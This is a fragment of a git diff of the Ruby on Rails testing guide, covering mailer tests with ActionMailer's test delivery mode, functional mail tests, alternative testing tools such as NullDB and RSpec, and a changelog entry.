    This is the right time to understand a little more about writing tests for your mailers. The line ActionMailer::Base.delivery_method = :test in config/environments/test.rb sets the delivery method to test mode so that email will not actually be delivered (useful to avoid spamming your users while testing) but instead it will be appended to an array (ActionMailer::Base.deliveries).

    +

    However often in unit tests, mails will not actually be sent, simply constructed, as in the example above, where the precise content of the email is checked against what it should be.

    +

    10.3. Functional Testing

    +

    Functional testing for mailers involves more than just checking that the email body, recipients and so forth are correct. In functional mail tests you call the mail deliver methods and check that the appropriate emails have been appended to the delivery list. It is fairly safe to assume that the deliver methods themselves do their job You are probably more interested in is whether your own business logic is sending emails when you expect them to got out. For example, you can check that the invite friend operation is sending an email appropriately:

    assert_equal invite_email.to[0], 'friend@example.com' assert_match /Hi friend@example.com/, invite_email.body end -end -
    +end -

    8. Other Testing Approaches

    +

    11. Other Testing Approaches

    -

    The built-in test/unit based testing is not the only way to test Rails applications. Rails developers have come up with a wide variety of other approaches and aids for testing, including:

    -
      +

      The built-in test/unit based testing is not the only way to test Rails applications. Rails developers have come up with a wide variety of other approaches and aids for testing, including:

      +
      • NullDB, a way to speed up testing by avoiding database use. @@ -1388,15 +1671,15 @@ http://www.gnu.org/software/src-highlite -->

      • -link: RSpec, a behavior-driven development framework +RSpec, a behavior-driven development framework

    -

    9. Changelog

    +

    12. Changelog

    - -
      + +
      • November 13, 2008: Revised based on feedback from Pratik Naik by Akshay Surve (not yet approved for publication) -- cgit v1.2.3